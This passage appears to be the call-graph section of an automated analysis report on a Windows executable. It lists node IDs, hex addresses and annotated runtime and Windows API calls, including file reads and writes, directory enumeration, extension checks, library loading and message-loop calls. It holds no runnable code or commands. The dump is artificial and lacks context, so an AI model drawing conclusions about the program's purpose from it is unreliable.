41032->41033 41058 3045dc 58 API calls 6 library calls 41032->41058 41033->41036 41059 30495e 58 API calls 6 library calls 41033->41059 41036->41007 41038 30a786 41037->41038 41039 30a788 IsProcessorFeaturePresent 41037->41039 41038->41016 41041 30ab9c 41039->41041 41061 30ab4b 5 API calls ___raise_securityfailure 41041->41061 41043 30ac7f 41043->41016 41045 308175 41044->41045 41046 30818a 41044->41046 41047 305208 __wopenfile 58 API calls 41045->41047 41046->41024 41048 30817a 41047->41048 41062 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41048->41062 41050 308185 41050->41024 41051->41024 41052->41013 41054 30501f __getptd_noexit 58 API calls 41053->41054 41055 30500d 41054->41055 41056 30501a 41055->41056 41060 307c2e 58 API calls 3 library calls 41055->41060 41056->41032 41058->41033 41059->41036 41061->41043 41062->41050 41064 300eb3 EnterCriticalSection 41063->41064 41065 300e9d 41063->41065 41064->40994 41066 308af7 __lock 58 API calls 41065->41066 41067 300ea6 41066->41067 41067->40994 41069 30816b __input_l 58 API calls 41068->41069 41070 30afdf 41069->41070 41081 3189c2 41070->41081 41072 30afe5 __stbuf 41073 30b034 41072->41073 41074 308cde __malloc_crt 58 API calls 41072->41074 41073->40997 41074->41073 41076 301faf 41075->41076 41077 30afaa 41075->41077 41080 301fc9 LeaveCriticalSection LeaveCriticalSection __stbuf __getstream 41076->41080 41077->41076 41091 30836b 41077->41091 41079->40995 41080->40995 41082 3189da 41081->41082 41083 3189cd 41081->41083 41086 3189e6 41082->41086 41087 305208 __wopenfile 58 API calls 41082->41087 41084 305208 __wopenfile 58 API calls 41083->41084 41085 3189d2 41084->41085 41085->41072 41086->41072 41088 318a07 41087->41088 41090 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41088->41090 41090->41085 41092 30837e 41091->41092 41096 3083a2 41091->41096 41093 30816b __input_l 58 API calls 41092->41093 41092->41096 41094 30839b 41093->41094 41097 30df14 41094->41097 41096->41076 41098 30df20 _raise 41097->41098 41099 30df2d 41098->41099 41101 30df44 41098->41101 41197 3051d4 58 API calls __getptd_noexit 41099->41197 41100 30dfe3 41201 3051d4 58 API calls __getptd_noexit 41100->41201 41101->41100 41103 30df58 41101->41103 41106 30df80 41103->41106 41107 30df76 41103->41107 41105 30df32 41109 305208 __wopenfile 58 API calls 41105->41109 41125 31b134 41106->41125 41198 3051d4 58 API calls __getptd_noexit 41107->41198 41108 30df7b 41113 305208 __wopenfile 58 API calls 41108->41113 41120 30df39 _raise 41109->41120 41112 30df86 41114 30df99 41112->41114 41115 30dfac 41112->41115 41116 30dfef 41113->41116 41134 30e003 41114->41134 41119 305208 __wopenfile 58 API calls 41115->41119 41202 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41116->41202 41122 30dfb1 41119->41122 41120->41096 41121 30dfa5 41200 30dfdb LeaveCriticalSection __unlock_fhandle 41121->41200 41199 3051d4 58 API calls __getptd_noexit 41122->41199 41126 31b140 _raise 41125->41126 41127 31b18f EnterCriticalSection 41126->41127 41128 308af7 __lock 58 API calls 41126->41128 41130 31b1b5 _raise 41127->41130 41129 31b165 41128->41129 41131 31b17d 41129->41131 41203 31263e InitializeCriticalSectionAndSpinCount 41129->41203 41130->41112 41204 31b1b9 LeaveCriticalSection _doexit 41131->41204 41135 30e010 __ftell_nolock 41134->41135 41136 30e06e 41135->41136 41137 30e04f 41135->41137 41168 30e044 41135->41168 41142 30e0c6 41136->41142 41143 30e0aa 41136->41143 41205 3051d4 58 API calls __getptd_noexit 41137->41205 41139 30a77e __atoldbl_l 6 API calls 41140 30e864 41139->41140 41140->41121 41141 30e054 41144 305208 __wopenfile 58 API calls 41141->41144 41145 30e0df 41142->41145 41209 30f744 60 API calls 3 library calls 41142->41209 41207 3051d4 58 API calls __getptd_noexit 41143->41207 41147 30e05b 41144->41147 41149 3189c2 __stbuf 58 API calls 41145->41149 41206 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41147->41206 41152 30e0ed 41149->41152 41150 30e0af 41153 305208 __wopenfile 58 API calls 41150->41153 41154 30e446 41152->41154 41159 305007 _TestDefaultLanguage 58 API calls 41152->41159 41155 30e0b6 41153->41155 41157 30e464 41154->41157 41158 30e7d9 WriteFile 41154->41158 41208 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41155->41208 41160 30e588 41157->41160 41166 30e47a 41157->41166 41161 30e439 GetLastError 41158->41161 41187 30e678 41158->41187 41163 30e119 GetConsoleMode 41159->41163 41162 30e593 41160->41162 41180 30e67d 41160->41180 41170 30e406 41161->41170 41164 30e812 41162->41164 41175 30e5f8 WriteFile 41162->41175 41163->41154 41165 30e158 41163->41165 41164->41168 41169 305208 __wopenfile 58 API calls 41164->41169 41165->41154 41171 30e168 GetConsoleCP 41165->41171 41166->41164 41167 30e4e9 WriteFile 41166->41167 41166->41170 41167->41161 41167->41166 41168->41139 41172 30e840 41169->41172 41170->41164 41170->41168 41173 30e566 41170->41173 41171->41164 41193 30e197 41171->41193 41213 3051d4 58 API calls __getptd_noexit 41172->41213 41177 30e571 41173->41177 41178 30e809 41173->41178 41174 30e6f2 WideCharToMultiByte 41174->41161 41189 30e739 41174->41189 41175->41161 41181 30e647 41175->41181 41182 305208 __wopenfile 58 API calls 41177->41182 41212 3051e7 58 API calls 3 library calls 41178->41212 41180->41164 41180->41174 41181->41162 41181->41170 41181->41187 41184 30e576 41182->41184 41183 30e741 WriteFile 41186 30e794 GetLastError 41183->41186 41183->41189 41211 3051d4 58 API calls __getptd_noexit 41184->41211 41186->41189 41187->41170 41189->41170 41189->41180 41189->41183 41189->41187 41190 30e280 WideCharToMultiByte 41190->41170 41192 30e2bb WriteFile 41190->41192 41191 31c76c 60 API calls __putch_nolock 41191->41193 41192->41161 41195 30e2ed 41192->41195 41193->41170 41193->41190 41193->41191 41193->41195 41210 302d33 58 API calls __isleadbyte_l 41193->41210 41194 32058c WriteConsoleW CreateFileW __putwch_nolock 41194->41195 41195->41161 41195->41170 41195->41193 41195->41194 41196 30e315 WriteFile 41195->41196 41196->41161 41196->41195 41197->41105 41198->41108 41199->41121 41200->41120 41201->41108 41202->41120 41203->41131 41204->41127 41205->41141 41206->41168 41207->41150 41208->41168 41209->41145 41210->41193 41211->41168 41212->41168 41213->41168 41214->40955 41215->40957 41216->40960 41217->40965 41218->40973 41219->40492 41221 2f3c74 _memset 41220->41221 41222 2f3c62 41220->41222 41221->40496 41223 2f3c67 41222->41223 41224 2f3c96 41222->41224 41225 303b4c 59 API calls 41223->41225 41226 32f23e 59 API calls 41224->41226 41227 2f3c6d 41225->41227 41226->41227 41227->41221 41237 32f1bb 59 API calls 3 library calls 41227->41237 41231 2f8513 41230->41231 41236 2f8520 41230->41236 41231->41236 41238 2f5810 59 API calls _signal 41231->41238 41232 2f8619 41232->40498 41234 32f23e 59 API calls 41234->41236 41236->41232 41236->41234 41239 2f6760 59 API calls 2 library calls 41236->41239 41238->41236 41239->41236 41240->40500 41241->40502 41242->40506 41243->40511 41244->40513 41245->40540 41246->40543 41247->40545 41248->40528 41249->40530 41250->40560 41251->40560 41252->40589 41253->40589 41254->40598 41255->40598 41256->40606 41285 301037 41257->41285 41259 2ec78a 41259->40618 41260 300546 41259->41260 41261 300550 41260->41261 41262 300564 41260->41262 41263 305208 __wopenfile 58 API calls 41261->41263 41262->40630 41264 300555 41263->41264 41485 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41264->41485 41266 300560 41266->40630 41269 30110d _raise 41267->41269 41268 30111e 41271 305208 __wopenfile 58 API calls 41268->41271 41269->41268 41270 30114c 41269->41270 41275 30112e _raise 41270->41275 41486 300e53 41270->41486 41272 301123 41271->41272 41531 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41272->41531 41275->40630 41276 30117d 41532 3011b5 LeaveCriticalSection LeaveCriticalSection _ungetc 41276->41532 41279 30115b 41279->41276 41492 309312 41279->41492 41280->40618 41281->40623 41282->40625 41283->40631 41284->40634 41288 301043 _raise 41285->41288 41286 301056 41287 305208 __wopenfile 58 API calls 41286->41287 41290 30105b 41287->41290 41288->41286 41289 301087 41288->41289 41304 308df4 41289->41304 41334 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41290->41334 41293 30108c 41294 3010a2 41293->41294 41295 301095 41293->41295 41297 3010cc 41294->41297 41298 3010ac 41294->41298 41296 305208 __wopenfile 58 API calls 41295->41296 41303 301066 _raise @_EH4_CallFilterFunc@8 41296->41303 41319 308f13 41297->41319 41299 305208 __wopenfile 58 API calls 41298->41299 41299->41303 41303->41259 41305 308e00 _raise 41304->41305 41306 308af7 __lock 58 API calls 41305->41306 41317 308e0e 41306->41317 41307 308e82 41336 308f0a 41307->41336 41308 308e89 41309 308cde __malloc_crt 58 API calls 41308->41309 41311 308e90 41309->41311 41311->41307 41340 31263e InitializeCriticalSectionAndSpinCount 41311->41340 41312 308eff _raise 41312->41293 41314 308b9f __mtinitlocknum 58 API calls 41314->41317 41315 300e92 __getstream 59 API calls 41315->41317 41316 308eb6 EnterCriticalSection 41316->41307 41317->41307 41317->41308 41317->41314 41317->41315 41339 300efc LeaveCriticalSection LeaveCriticalSection _doexit 41317->41339 41328 308f33 __wopenfile 41319->41328 41320 308f4d 41322 305208 __wopenfile 58 API calls 41320->41322 41321 309108 41321->41320 41325 30916b 41321->41325 41323 308f52 41322->41323 41345 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41323->41345 41342 31c214 41325->41342 41326 3010d7 41335 3010f9 LeaveCriticalSection LeaveCriticalSection _ungetc 41326->41335 41328->41320 41328->41321 41346 31c232 60 API calls 2 library calls 41328->41346 41330 309101 41330->41321 41347 31c232 60 API calls 2 library calls 41330->41347 41332 309120 41332->41321 41348 31c232 60 API calls 2 library calls 41332->41348 41334->41303 41335->41303 41341 308c81 LeaveCriticalSection 41336->41341 41338 308f11 41338->41312 41339->41317 41340->41316 41341->41338 41349 31b9f8 41342->41349 41344 31c22d 41344->41326 41345->41326 41346->41330 41347->41332 41348->41321 41352 31ba04 _raise 41349->41352 41350 31ba1a 41351 305208 __wopenfile 58 API calls 41350->41351 41353 31ba1f 41351->41353 41352->41350 41354 31ba50 41352->41354 41432 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41353->41432 41360 31bac1 41354->41360 41359 31ba29 _raise 41359->41344 41361 31bae1 41360->41361 41434 327f50 41361->41434 41364 31bafd 41366 31bb37 41364->41366 41371 31bb5a 41364->41371 41380 31bc34 41364->41380 41365 31c213 41465 3051d4 58 API calls __getptd_noexit 41366->41465 41368 31bb3c 41369 305208 __wopenfile 58 API calls 41368->41369 41370 31bb49 41369->41370 41466 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41370->41466 41372 31bc18 41371->41372 41375 31bbf6 41371->41375 41467 3051d4 58 API calls __getptd_noexit 41372->41467 41441 31b1c2 41375->41441 41376 31bc1d 41377 305208 __wopenfile 58 API calls 41376->41377 41378 31bc2a 41377->41378 41468 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41378->41468 41480 3042fd 8 API calls 2 library calls 41380->41480 41382 31bcc4 41383 31bcf1 41382->41383 41384 31bcce 41382->41384 41459 31b88d 41383->41459 41469 3051d4 58 API calls __getptd_noexit 41384->41469 41387 31bcd3 41388 305208 __wopenfile 58 API calls 41387->41388 41390 31bcdd 41388->41390 41389 31bd91 GetFileType 41391 31bd9c GetLastError 41389->41391 41392 31bdde 41389->41392 41395 305208 __wopenfile 58 API calls 41390->41395 41471 3051e7 58 API calls 3 library calls 41391->41471 41472 31b56e 59 API calls 2 library calls 41392->41472 41393 31bd5f GetLastError 41470 3051e7 58 API calls 3 library calls 41393->41470 41400 31ba6c 41395->41400 41398 31b88d ___createFile 3 API calls 41402 31bd54 41398->41402 41399 31bd84 41405 305208 __wopenfile 58 API calls 41399->41405 41433 31ba95 LeaveCriticalSection __unlock_fhandle 41400->41433 41401 31bdc3 CloseHandle 41401->41399 41404 31bdd1 41401->41404 41402->41389 41402->41393 41406 305208 __wopenfile 58 API calls 41404->41406 41405->41380 41407 31bdd6 41406->41407 41407->41399 41408 31bfb7 41408->41380 41411 31c18a CloseHandle 41408->41411 41409 31bdfc 41409->41408 41428 31be7d 41409->41428 41473 30f744 60 API calls 3 library calls 41409->41473 41413 31b88d ___createFile 3 API calls 41411->41413 41412 31be66 41412->41428 41474 3051d4 58 API calls __getptd_noexit 41412->41474 41415 31c1b1 41413->41415 41414 30b5c4 70 API calls __read_nolock 41414->41428 41417 31c1b9 GetLastError 41415->41417 41418 31c041 41415->41418 41478 3051e7 58 API calls 3 library calls 41417->41478 41418->41380 41420 31be85 41420->41428 41475 310b25 61 API calls 3 library calls 41420->41475 41476 327cac 82 API calls 5 library calls 41420->41476 41421 31c1c5 41479 31b36b 59 API calls 2 library calls 41421->41479 41425 30df14 __write 78 API calls 41425->41428 41426 31c034 41477 310b25 61 API calls 3 library calls 41426->41477 41428->41408 41428->41414 41428->41420 41428->41425 41428->41426 41430 30f744 60 API calls __lseeki64_nolock 41428->41430 41429 31c03b 41431 305208 __wopenfile 58 API calls 41429->41431 41430->41428 41431->41418 41432->41359 41433->41359 41435 327f5a 41434->41435 41436 327f6f 41434->41436 41437 305208 __wopenfile 58 API calls 41435->41437 41436->41364 41438 327f5f 41437->41438 41481 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41438->41481 41440 327f6a 41440->41364 41442 31b1ce _raise 41441->41442 41443 308b9f __mtinitlocknum 58 API calls 41442->41443 41444 31b1df 41443->41444 41445 308af7 __lock 58 API calls 41444->41445 41446 31b1e4 _raise 41444->41446 41455 31b1f2 41445->41455 41446->41382 41447 31b340 41484 31b362 LeaveCriticalSection _doexit 41447->41484 41449 31b2d2 41450 308c96 __calloc_crt 58 API calls 41449->41450 41453 31b2db 41450->41453 41451 308af7 __lock 58 API calls 41451->41455 41452 31b272 EnterCriticalSection 41454 31b282 LeaveCriticalSection 41452->41454 41452->41455 41453->41447 41456 31b134 ___lock_fhandle 59 API calls 41453->41456 41454->41455 41455->41447 41455->41449 41455->41451 41455->41452 41482 31263e InitializeCriticalSectionAndSpinCount 41455->41482 41483 31b29a LeaveCriticalSection _doexit 41455->41483 41456->41447 41460 31b898 ___crtIsPackagedApp 41459->41460 41461 31b8f3 CreateFileW 41460->41461 41462 31b89c GetModuleHandleW GetProcAddress 41460->41462 41463 31b911 41461->41463 41464 31b8b9 41462->41464 41463->41389 41463->41393 41463->41398 41464->41463 41465->41368 41466->41400 41467->41376 41468->41380 41469->41387 41470->41399 41471->41401 41472->41409 41473->41412 41474->41428 41475->41420 41476->41420 41477->41429 41478->41421 41479->41418 41480->41365 41481->41440 41482->41455 41483->41455 41484->41446 41485->41266 41487 300e63 41486->41487 41488 300e85 EnterCriticalSection 41486->41488 41487->41488 41489 300e6b 41487->41489 41490 300e7b 41488->41490 41491 308af7 __lock 58 API calls 41489->41491 41490->41279 41491->41490 41493 3094a3 41492->41493 41494 30932b 41492->41494 41530 30938a 41493->41530 41556 31c784 72 API calls 4 library calls 41493->41556 41495 30816b __input_l 58 API calls 41494->41495 41496 309331 41495->41496 41498 30816b __input_l 58 API calls 41496->41498 41511 309354 41496->41511 41501 30933d 41498->41501 41499 3093c0 41499->41493 41502 30816b __input_l 58 API calls 41499->41502 41500 30936d 41503 30b2f2 __filbuf 72 API calls 41500->41503 41509 309372 41500->41509 41504 30816b __input_l 58 API calls 41501->41504 41501->41511 41506 3093d0 41502->41506 41503->41509 41505 309349 41504->41505 41507 30816b __input_l 58 API calls 41505->41507 41508 3093f3 41506->41508 41512 30816b __input_l 58 API calls 41506->41512 41507->41511 41508->41493 41510 30940e 41508->41510 41513 30b2f2 __filbuf 72 API calls 41509->41513 41509->41530 41514 309416 41510->41514 41533 30b2f2 41510->41533 41511->41499 41511->41500 41515 3093dc 41512->41515 41513->41530 41514->41530 41553 302d33 58 API calls __isleadbyte_l 41514->41553 41515->41508 41517 30816b __input_l 58 API calls 41515->41517 41519 3093e8 41517->41519 41521 30816b __input_l 58 API calls 41519->41521 41520 30943e 41522 309473 41520->41522 41524 309448 41520->41524 41526 30b2f2 __filbuf 72 API calls 41520->41526 41521->41508 41555 31c76c 60 API calls __input_l 41522->41555 41524->41522 41527 309460 41524->41527 41525 309487 41529 305208 __wopenfile 58 API calls 41525->41529 41525->41530 41526->41524 41554 31c607 60 API calls 5 library calls 41527->41554 41529->41530 41530->41279 41531->41275 41532->41275 41534 30b2fd 41533->41534 41537 30b312 41533->41537 41535 305208 __wopenfile 58 API calls 41534->41535 41536 30b302 41535->41536 41590 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41536->41590 41539 30b347 41537->41539 41546 30b30d 41537->41546 41591 318a16 58 API calls __malloc_crt 41537->41591 41541 30816b __input_l 58 API calls 41539->41541 41542 30b35b 41541->41542 41557 30b4b0 41542->41557 41544 30b362 41545 30816b __input_l 58 API calls 41544->41545 41544->41546 41547 30b385 41545->41547 41546->41514 41547->41546 41548 30816b __input_l 58 API calls 41547->41548 41549 30b391 41548->41549 41549->41546 41550 30816b __input_l 58 API calls 41549->41550 41551 30b39e 41550->41551 41552 30816b __input_l 58 API calls 41551->41552 41552->41546 41553->41520 41554->41530 41555->41525 41556->41530 41558 30b4bc _raise 41557->41558 41559 30b4e0 41558->41559 41560 30b4c9 41558->41560 41562 30b5a4 41559->41562 41565 30b4f4 41559->41565 41660 3051d4 58 API calls __getptd_noexit 41560->41660 41665 3051d4 58 API calls __getptd_noexit 41562->41665 41564 30b4ce 41567 305208 __wopenfile 58 API calls 41564->41567 41568 30b512 41565->41568 41569 30b51f 41565->41569 41566 30b517 41575 305208 __wopenfile 58 API calls 41566->41575 41570 30b4d5 _raise 41567->41570 41661 3051d4 58 API calls __getptd_noexit 41568->41661 41572 30b541 41569->41572 41573 30b52c 41569->41573 41570->41544 41574 31b134 ___lock_fhandle 59 API calls 41572->41574 41662 3051d4 58 API calls __getptd_noexit 41573->41662 41577 30b547 41574->41577 41582 30b539 41575->41582 41579 30b55a 41577->41579 41580 30b56d 41577->41580 41578 30b531 41581 305208 __wopenfile 58 API calls 41578->41581 41592 30b5c4 41579->41592 41585 305208 __wopenfile 58 API calls 41580->41585 41581->41582 41666 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41582->41666 41587 30b572 41585->41587 41586 30b566 41664 30b59c LeaveCriticalSection __unlock_fhandle 41586->41664 41663 3051d4 58 API calls __getptd_noexit 41587->41663 41590->41546 41591->41539 41593 30b5e5 41592->41593 41594 30b5fc 41592->41594 41667 3051d4 58 API calls __getptd_noexit 41593->41667 41596 30bd34 41594->41596 41601 30b636 41594->41601 41677 3051d4 58 API calls __getptd_noexit 41596->41677 41598 30b5ea 41600 305208 __wopenfile 58 API calls 41598->41600 41599 30bd39 41602 305208 __wopenfile 58 API calls 41599->41602 41640 30b5f1 41600->41640 41603 30b63e 41601->41603 41608 30b655 41601->41608 41604 30b64a 41602->41604 41668 3051d4 58 API calls __getptd_noexit 41603->41668 41678 3042d2 9 API calls __invalid_parameter_noinfo_noreturn 41604->41678 41606 30b643 41610 305208 __wopenfile 58 API calls 41606->41610 41609 30b66a 41608->41609 41612 30b684 41608->41612 41613 30b6a2 41608->41613 41608->41640 41669 3051d4 58 API calls __getptd_noexit 41609->41669 41610->41604 41612->41609 41617 30b68f 41612->41617 41614 308cde __malloc_crt 58 API calls 41613->41614 41615 30b6b2 41614->41615 41618 30b6d5 41615->41618 41619 30b6ba 41615->41619 41616 3189c2 __stbuf 58 API calls 41620 30b7a3 41616->41620 41617->41616 41671 30f744 60 API calls 3 library calls 41618->41671 41621 305208 __wopenfile 58 API calls 41619->41621 41622 30b81c ReadFile 41620->41622 41627 30b7b9 GetConsoleMode 41620->41627 41624 30b6bf 41621->41624 41625 30bcfc GetLastError 41622->41625 41626 30b83e 41622->41626 41670 3051d4 58 API calls __getptd_noexit 41624->41670 41629 30b7fc 41625->41629 41630 30bd09 41625->41630 41626->41625 41634 30b80e 41626->41634 41631 30b819 41627->41631 41632 30b7cd 41627->41632 41643 30b802 41629->41643 41672 3051e7 58 API calls 3 library calls 41629->41672 41633 305208 __wopenfile 58 API calls 41630->41633 41631->41622 41632->41631 41635 30b7d3 ReadConsoleW 41632->41635 41636 30bd0e 41633->41636 41642 30bae0 41634->41642 41634->41643 41645 30b873 41634->41645 41635->41634 41637 30b7f6 GetLastError 41635->41637 41676 3051d4 58 API calls __getptd_noexit 41636->41676 41637->41629 41640->41586 41641 300bed _free 58 API calls 41641->41640 41642->41643 41647 30bbe6 ReadFile 41642->41647 41643->41640 41643->41641 41646 30b8df ReadFile 41645->41646 41651 30b960 41645->41651 41648 30b900 GetLastError 41646->41648 41658 30b90a 41646->41658 41653 30bc09 GetLastError 41647->41653 41659 30bc17 41647->41659 41648->41658 41649 30ba1d 41654 30b9cd MultiByteToWideChar 41649->41654 41674 30f744 60 API calls 3 library calls 41649->41674 41650 30ba0d 41652 305208 __wopenfile 58 API calls 41650->41652 41651->41643 41651->41649 41651->41650 41651->41654 41652->41643 41653->41659 41654->41637 41654->41643 41658->41645 41673 30f744 60 API calls 3 library calls 41658->41673 41659->41642 41675 30f744 60 API calls 3 library calls 41659->41675 41660->41564 41661->41566 41662->41578 41663->41586 41664->41570 41665->41566 41666->41570 41667->41598 41668->41606 41669->41606 41670->41640 41671->41617 41672->41643 41673->41658 41674->41654 41675->41659 41676->41643 41677->41599 41678->41640 41680 2f5ab8 41679->41680 41681 2f59e8 41679->41681 41758 32f26c 59 API calls 3 library calls 41680->41758 41682 2f5ac2 41681->41682 41683 2f5a02 41681->41683 41685 32f23e 59 API calls 41682->41685 41686 2f5acc 41683->41686 41687 2f5a1a 41683->41687 41695 2f5a2a _signal 41683->41695 41685->41686 41688 32f23e 59 API calls 41686->41688 41689 2f6950 59 API calls 41687->41689 41687->41695 41698 2f5ad6 41688->41698 41689->41695 41690 2f5b36 41691 2f5b49 41690->41691 41692 2f5bf1 41690->41692 41694 2f5bfb 41691->41694 41696 2f5b61 41691->41696 41702 2f5b71 _signal 41691->41702 41693 32f23e 59 API calls 41692->41693 41693->41694 41697 32f23e 59 API calls 41694->41697 41695->40648 41700 2f6950 59 API calls 41696->41700 41696->41702 41699 2f5c05 41697->41699 41698->41690 41701 2f5b15 41698->41701 41700->41702 41703 2f59d0 59 API calls 41701->41703 41702->40648 41704 2f5b30 41703->41704 41704->40648 41758->41682 41847 2fc001 41846->41847 41848 2fc00a 41846->41848 41847->41848 41849 2fc04c 41847->41849 41850 2fc083 41847->41850 41848->40760 41851 2fcf30 59 API calls 41849->41851 41852 2fc09e 41850->41852 41857 2fc0e1 41850->41857 41851->41848 41858 2fcf30 41852->41858 41855 2fc0b2 41855->41848 41862 2fd5b0 41855->41862 41866 2fc540 59 API calls Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception 41857->41866 41859 2fcf5b 41858->41859 41860 2fcf41 41858->41860 41859->41855 41860->41859 41861 2f4690 59 API calls 41860->41861 41861->41860 41863 2fd5e2 41862->41863 41864 2fd63e 41863->41864 41865 2f4690 59 API calls 41863->41865 41864->41848 41865->41863 41866->41855 41910 303f74 41867->41910 41870 2ff196 Sleep 41871 2ff94b 41870->41871 41872 2ff1c1 41870->41872 41873 2f4690 59 API calls 41871->41873 41874 2f0a50 65 API calls 41872->41874 41875 2ff97a 41873->41875 41878 2ff1cd 41874->41878 41971 2f0160 89 API calls 5 library calls 41875->41971 41877 2f5c10 59 API calls 41879 2ff274 41877->41879 41882 300235 _W_store_winword 60 API calls 41878->41882 41885 2ff216 41878->41885 41913 2ef730 41879->41913 41880 2ff9c1 SendMessageW 41883 2ff9e1 41880->41883 41905 2ff8af 41880->41905 41882->41878 41883->41905 41884 2f11c0 170 API calls 41886 2ff987 41884->41886 41885->41877 41886->41880 41886->41884 41887 2f1ab0 PeekMessageW DispatchMessageW PeekMessageW 41886->41887 41887->41886 41888 2ff281 41889 2ff392 41888->41889 41890 2f5c10 59 API calls 41888->41890 41897 2ef730 192 API calls 41888->41897 41891 2f5c10 59 API calls 41889->41891 41893 2ef730 192 API calls 41889->41893 41898 2ff52c 41889->41898 41890->41888 41891->41889 41892 2ff5bd PeekMessageW 41892->41898 41893->41889 41894 2f4690 59 API calls 41894->41898 41895 2ff689 41896 2f5c10 59 API calls 41895->41896 41899 2ff73e 41896->41899 41897->41888 41898->41892 41898->41894 41898->41895 41900 2ff5d6 DispatchMessageW PeekMessageW 41898->41900 41902 2ef730 192 API calls 41898->41902 41901 2ef730 192 API calls 41899->41901 41900->41898 41908 2ff74b 41901->41908 41902->41898 41903 2ff893 SendMessageW 41903->41905 41904 2ff7cf PeekMessageW 41904->41908 41906 2f4690 59 API calls 41906->41908 41907 2ff7e7 DispatchMessageW PeekMessageW 41907->41908 41908->41903 41908->41904 41908->41906 41908->41907 41909 2ef730 192 API calls 41908->41909 41909->41908 41911 305007 _TestDefaultLanguage 58 API calls 41910->41911 41912 2ff16a Sleep 41911->41912 41912->41870 41912->41905 41914 2f1ab0 3 API calls 41913->41914 41925 2ef765 41914->41925 41915 2ef8b5 41916 2f4690 59 API calls 41915->41916 41917 2ef8ea PathFindFileNameW 41916->41917 41918 2ef923 41917->41918 41920 2f5c10 59 API calls 41918->41920 41919 2f4690 59 API calls 41919->41925 41921 2ef98c 41920->41921 41922 2f3520 59 API calls 41921->41922 41939 2ef9a8 _memmove 41922->41939 41923 300235 _W_store_winword 60 API calls 41923->41925 41924 2f5ae0 59 API calls 41924->41925 41925->41915 41925->41919 41925->41923 41925->41924 41941 2ef927 41925->41941 41926 2efa44 PathFindFileNameW 41926->41939 41927 2efb28 41928 2efcdf 41927->41928 41931 2f4690 59 API calls 41927->41931 42005 2f7140 41928->42005 41929 2f5c10 59 API calls 41929->41939 41932 2efb55 41931->41932 41972 2ef310 LoadLibraryW 41932->41972 41935 2f3520 59 API calls 41935->41939 41937 2efb5a 41937->41928 41938 2f4690 59 API calls 41937->41938 41940 2efb75 41938->41940 41939->41926 41939->41927 41939->41929 41939->41935 41942 2f3a90 59 API calls 41940->41942 41941->41888 41943 2efb86 PathAppendW 41942->41943 41947 2f8400 59 API calls 41943->41947 41944 2f0052 FindNextFileW 41946 2f006b FindClose 41944->41946 41969 2efd22 _wcsstr 41944->41969 41946->41941 41949 2efbfe _memmove 41947->41949 41948 2efc4f PathFileExistsW 41948->41928 41952 2efc6d 41948->41952 41949->41948 41950 2f7140 59 API calls 41950->41969 41951 2f1ab0 3 API calls 41951->41969 41954 300c62 _malloc 58 API calls 41952->41954 41956 2efc77 lstrcpyW 41954->41956 41955 2f4690 59 API calls 41955->41969 41958 2efca3 lstrcatW 41956->41958 41959 2efca1 41956->41959 41960 2f4690 59 API calls 41958->41960 41959->41958 41963 2efccf 41960->41963 41961 2f5ae0 59 API calls 41964 2eff41 PathFindExtensionW 41961->41964 42037 2ef0e0 64 API calls 41963->42037 41964->41969 41966 2efcd6 41967 300bed _free 58 API calls 41966->41967 41969->41941 41969->41944 41969->41950 41969->41951 41969->41955 41969->41961 41970 2f11c0 170 API calls 41969->41970 42013 2f5ae0 41969->42013 42028 2f3b70 41969->42028 41970->41969 41971->41886 41973 2ef34b GetProcAddress 41972->41973 41976 2ef344 41972->41976 41974 2f3a90 59 API calls 41973->41974 41975 2ef368 41974->41975 41977 2f8400 59 API calls 41975->41977 41976->41937 41978 2ef39d 41977->41978 41979 2f5c10 59 API calls 41978->41979 41980 2ef3c4 41979->41980 41981 2f5c10 59 API calls 41980->41981 41982 2ef3eb 41981->41982 42038 2ef2b0 59 API calls 41982->42038 41984 2ef3fe 41985 2f5c10 59 API calls 41984->41985 41986 2ef45e 41985->41986 41987 2f5c10 59 API calls 41986->41987 41988 2ef485 41987->41988 42039 2ef2b0 59 API calls 41988->42039 41990 2ef498 41991 2ef50a 41990->41991 42040 2f8380 65 API calls __forcdecpt_l 41990->42040 42006 2f7197 42005->42006 42008 2f5d50 59 API calls 42006->42008 42009 2f71c8 42006->42009 42007 2f59d0 59 API calls 42010 2f71ef 42007->42010 42008->42009 42009->42007 42011 2f5ae0 59 API calls 42010->42011 42012 2efd00 FindFirstFileW 42011->42012 42012->41969 42014 2f5aee 42013->42014 42015 2f5b36 42013->42015 42014->42015 42025 2f5b15 42014->42025 42016 2f5b49 42015->42016 42017 2f5bf1 42015->42017 42019 2f5b71 _signal 42016->42019 42020 2f5bfb 42016->42020 42022 2f5b61 42016->42022 42018 32f23e 59 API calls 42017->42018 42018->42020 42019->41969 42021 32f23e 59 API calls 42020->42021 42023 2f5c05 42021->42023 42022->42019 42024 2f6950 59 API calls 42022->42024 42024->42019 42026 2f59d0 59 API calls 42025->42026 42027 2f5b30 42026->42027 42027->41969 42029 2f3b98 42028->42029 42030 2f3be0 42028->42030 42029->42030 42032 2f3b9e 42029->42032 42031 2f3bc0 42030->42031 42033 2f5480 59 API calls 42030->42033 42034 2f3c20 42031->42034 42036 2f4690 59 API calls 42031->42036 42032->42031 42042 2f5480 42032->42042 42033->42031 42034->41969 42036->42034 42037->41966 42038->41984 42039->41990 42040->41991 42043 2f5508 42042->42043 42044 2f54a5 42042->42044 42043->42031 42045 2f550e 42044->42045 42046 2f54c8 42044->42046 42049 32f23e 59 API calls 42045->42049 42047 2f54fb 42046->42047 42048 2f54e8 42046->42048 42054 2f6570 42047->42054 42051 2f6570 59 API calls 42048->42051 42050 2f5518 42049->42050 42050->42031 42053 2f54f5 42051->42053 42053->42031 42055 2f659f 42054->42055 42056 2f65ca 42054->42056 42057 2f65b9 42055->42057 42059 303b4c 59 API calls 42055->42059 42062 2f9850 42056->42062 42057->42056 42066 32f1bb 59 API calls 3 library calls 42057->42066 42059->42057 42061 2f65e2 42061->42043 42063 2f9882 